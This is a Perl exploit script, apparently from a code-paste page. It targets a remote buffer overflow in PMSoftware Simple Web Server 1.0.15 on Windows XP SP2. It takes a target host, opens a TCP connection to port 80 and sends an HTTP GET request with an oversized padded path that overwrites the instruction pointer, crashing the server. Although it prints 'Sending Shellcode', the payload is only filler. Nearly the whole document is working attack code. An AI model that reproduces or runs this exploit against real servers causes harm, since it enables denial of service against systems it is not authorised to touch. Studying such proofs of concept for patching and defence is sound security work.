test2.pl (1,20 KB)

Klartext PHP und ähnliche Sprachen

#!/usr/bin/perl
# DoS Exploit By mthumann@ernw.de
# Tested against WinXP + SP2
# Remote Buffer Overflow in PMSoftware Simple Web Server 1.0.15
# buffer[250]

use Socket;

print "PMSoftware Simple Web Server Exploit by Michael Thumann \n\n";

if (not $ARGV[0]) {
        print "Usage: swsexploit.pl <host>\n";
exit;}

$ip=$ARGV[0];

print "Sending Shellcode to: " . $ip . "\n\n";
my $testcode= "ERNWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB".
"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC".
"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD".
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE".
"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF".
"ABCDEFGHIJAAAA"; #EIP =41414141

my $attack="GET /".$testcode." HTTP/1.1\n" ;

$target= inet_aton($ip) || die("inet_aton problems");
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S);
                $|=1;
                print $attack;
                my @in=<S>;
                select(STDOUT);
                close(S);
        } else { die("Can't connect...\n"); }